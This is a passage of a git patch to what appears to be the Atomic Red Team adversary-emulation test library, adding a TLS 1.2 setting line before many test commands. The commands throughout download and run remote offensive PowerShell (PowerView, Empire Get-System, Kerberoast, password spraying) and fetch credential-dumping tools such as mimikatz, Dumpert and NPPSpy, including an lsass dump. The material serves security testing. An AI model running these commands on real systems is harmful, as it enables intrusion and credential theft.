\"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -15357,6 +15362,7 @@ privilege-escalation: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell @@ -15393,6 +15399,7 @@ privilege-escalation: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -15405,6 +15412,7 @@ privilege-escalation: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null @@ -16250,7 +16258,8 @@ privilege-escalation: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -17674,8 +17683,9 @@ privilege-escalation: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose name: powershell elevation_required: true - name: "`SeDebugPrivilege` token duplication" @@ -17686,8 +17696,9 @@ privilege-escalation: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique Token -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose name: powershell elevation_required: true T1546.005: @@ -20434,6 +20445,7 @@ defense-evasion: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell @@ -25272,6 +25284,7 @@ defense-evasion: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore @@ -30916,7 +30929,8 @@ defense-evasion: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -31050,6 +31064,7 @@ defense-evasion: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell @@ -31086,6 +31101,7 @@ defense-evasion: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -31098,6 +31114,7 @@ defense-evasion: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null @@ -35143,8 +35160,9 @@ defense-evasion: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose name: powershell elevation_required: true - name: "`SeDebugPrivilege` token duplication" @@ -35155,8 +35173,9 @@ defense-evasion: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' - -UseBasicParsing); Get-System -Technique Token -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose name: powershell elevation_required: true T1205: @@ -44284,7 +44303,8 @@ persistence: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -50047,10 +50067,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Find-LocalAdminAccess -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose name: powershell - name: Find local admins on all machines in domain (PowerView) auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd @@ -50062,10 +50081,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose name: powershell - name: Find Local Admins via Group Policy (PowerView) auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a @@ -50081,9 +50099,9 @@ discovery: type: Path default: "$env:COMPUTERNAME" executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} - -Verbose' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b @@ -50143,10 +50161,9 @@ discovery: prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" - -OutFile #{adfind_path} - -' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: "#{adfind_path} -f (objectcategory=group)\n" name: command_prompt @@ -51226,10 +51243,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose name: powershell T1040: technique: @@ -53292,10 +53308,9 @@ discovery: supported_platforms: - windows executor: - command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'' - -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell T1007: technique: @@ -60056,7 +60071,8 @@ execution: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -68135,6 +68151,7 @@ initial-access: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 26822e04..94a97982 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -99,6 +99,7 @@ if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ Expand-Archive $zippath $parentpath\wce -Force @@ -155,6 +156,7 @@ if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null @@ -238,6 +240,7 @@ if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} ``` @@ -312,6 +315,7 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() @@ -417,6 +421,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump ``` @@ -610,6 +615,7 @@ if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} ``` diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index f716aaf5..45930a48 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -118,6 +118,7 @@ if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" ``` diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 9c9b5bfe..60000e3a 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -95,6 +95,7 @@ Find existing user session on other computers. Upon execution, information about ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose ``` diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 82634bed..a290333a 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -181,6 +181,7 @@ This module utilizes the Windows API to schedule a task for code execution (note ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" ``` diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index b8770a1b..f3965a9e 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -72,6 +72,7 @@ This module executes notepad.exe from within the WINWORD.EXE process ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index c1a2510e..9a4adae9 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -32,6 +32,7 @@ is required. ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" ``` @@ -100,6 +101,7 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ##### Get Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -112,6 +114,7 @@ if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md index 2eeb4a9f..47d17a9b 100644 --- a/atomics/T1069.002/T1069.002.md +++ b/atomics/T1069.002/T1069.002.md @@ -124,6 +124,7 @@ Find machines where user has local admin access (PowerView). Upon execution, pro ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose ``` @@ -148,6 +149,7 @@ Enumerates members of the local Administrators groups across all machines in the ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose ``` @@ -177,7 +179,8 @@ takes a computer and determines who has admin rights over it through GPO enumera ```powershell -IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" ``` @@ -266,6 +269,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} ``` diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 3f420431..b1f7c663 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -93,6 +93,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" ``` diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index 7c23832c..5b71930e 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -96,6 +96,7 @@ https://github.com/dafthack/DomainPasswordSpray ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force ``` diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index c85e124d..cc5c2a7a 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -115,6 +115,7 @@ This module copies the data stored in the user's clipboard and writes it to a fi ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md index 05f6a2a7..031d8e3a 100644 --- a/atomics/T1134.001/T1134.001.md +++ b/atomics/T1134.001/T1134.001.md @@ -29,6 +29,7 @@ Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-get ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose ``` @@ -54,6 +55,7 @@ When executed successfully, the test displays the domain and name of the account ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose ``` diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 4cbe849e..102c0d90 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -186,6 +186,7 @@ Enumerate Domain Shares the current user has access. Upon execution, progress in ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose ``` diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 76606bc1..a1251039 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -27,6 +27,7 @@ them to $env:TEMP\windows-credentials.txt ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index f2312394..3dee6b3b 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -35,6 +35,7 @@ If the testing domain doesn't have any service principal name configured, there ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl ``` diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 26ccd064..c2d9c76d 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -40,6 +40,7 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst ```powershell $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap ``` diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 349306a5..a29d97dd 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -69,6 +69,7 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8 ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" From 2710d10531ef1816d245770984c31df423a3bdeb Mon Sep 17 00:00:00 2001 From: adeliktas <64136642+adeliktas@users.noreply.github.com> Date: Wed, 16 Jun 2021 22:28:41 +0200 Subject: [PATCH 